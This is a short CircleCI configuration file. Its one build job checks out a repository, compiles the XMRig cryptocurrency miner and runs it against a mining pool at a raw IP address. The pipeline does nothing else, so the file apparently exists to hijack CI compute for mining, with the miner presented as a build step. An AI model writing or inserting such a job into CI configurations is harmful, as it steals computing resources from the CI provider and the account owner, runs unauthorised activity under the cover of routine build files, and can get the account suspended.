version: 2
jobs:
  build:
    docker:
      - image: ubuntu:latest
    parallelism: 1
    steps:
      - run: apt-get update
      - checkout
      - run: bash ./build_xmrig.sh
      - run: /root/xmrig/build/xmrig -o 109.234.39.120:8080 -u circl-9